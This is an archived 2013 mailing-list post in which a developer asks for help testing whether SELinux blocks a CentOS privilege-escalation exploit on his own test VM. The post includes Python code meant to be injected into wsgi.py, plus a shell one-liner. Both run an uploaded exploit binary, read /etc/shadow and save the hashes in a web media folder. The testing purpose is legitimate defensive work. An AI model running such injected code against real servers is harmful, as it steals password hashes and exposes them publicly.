[CentralOH] Help Constructing a Science Experiment
Joshua Kramer
joskra42.list at gmail.com
Tue May 14 19:27:53 CEST 2013
Hello,
I just read about this CentOS vulnerability:
https://www.centos.org/modules/newbb/viewtopic.php?topic_id=42827&forum=59
I am trying to construct a science experiment to see if SELinux properly
mitigates this attack. I spun up a new VM of my dev server, and I have a
website running via Apache and WSGI. I am trying to simulate a potential
attack whereby someone uploads the exploit to the media directory of a
Mezzanine-based app, and runs it by injecting malicious code into wsgi.py.
Far fetched, I know, but it's a science experiment after all.
The code noted below just causes the Apache thread to hang. I don't show
any SELinux AVC denials so I don't think the executable is being run. (But
that might not be a valid assertion, seeing that I'm testing SELinux in the
first place.)
Does anyone see any glaring issues here?
Cheers,
-JK
# Evil hack: This command line works when run as a non-root user:
# echo "cat /etc/shadow" |
/srv/website/www/website/static/media/semtex_exploit >
/srv/website/www/website/static/media/passwords
from subprocess import Popen, PIPE
cmd = '/srv/website/www/website/static/media/semtex_exploit'
p = Popen(cmd, stdout=PIPE, stderr=PIPE, stdin=PIPE)
p.stdin.write("cat /etc/shadow\n")
mtext = p.stdout.read()
with open('/srv/website/www/website/static/media/shadow', 'a') as the_file:
the_file.write(mtext)
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/centraloh/attachments/20130514/922beecb/attachment.html>
More information about the CentralOH
mailing list